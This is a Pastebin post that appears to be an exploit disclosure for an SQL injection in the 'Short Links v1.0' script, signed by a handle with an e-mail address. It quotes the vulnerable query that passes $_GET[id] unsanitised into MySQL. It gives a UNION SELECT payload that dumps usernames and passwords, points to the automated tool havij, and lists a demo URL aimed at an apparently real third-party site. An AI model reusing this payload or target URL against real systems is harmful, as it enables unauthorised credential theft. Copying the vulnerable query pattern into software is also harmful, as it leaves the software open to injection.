Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- #########################################################################################
- # Short Links ® v1.0 sql injection #
- # Author : hamza killer #
- # E-mail : hlyzidi@gmail.com #
- # GoogleDork: -_- !!!!!! #
- # Vendor :n/n #
- # Thx TO : sec4ever members & sec4all & aircrack-ng #
- ########################################################################################
- SQl injection
- ================
- download.php
- die("Sorry, This is a bad request. Check your link...");
- }
- $pas->display("galbdz/header.tpl");
- =================
- ==> $sql = mysql_query("select * from links WHERE id='$_GET[id]'");
- exploit :
- ========
- download.php?id=[inject]
- download.php?id=-1'+union+select+1,group_concat(username,0x3a,password),3,4,5+from+user-- -
- or us havij
- ========
- demo :
- http://www.devsati.com/download.php?id=-1%27+union+select+1,group_concat%28username,0x3a,password%29,3,4,5+from+user--%20-
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement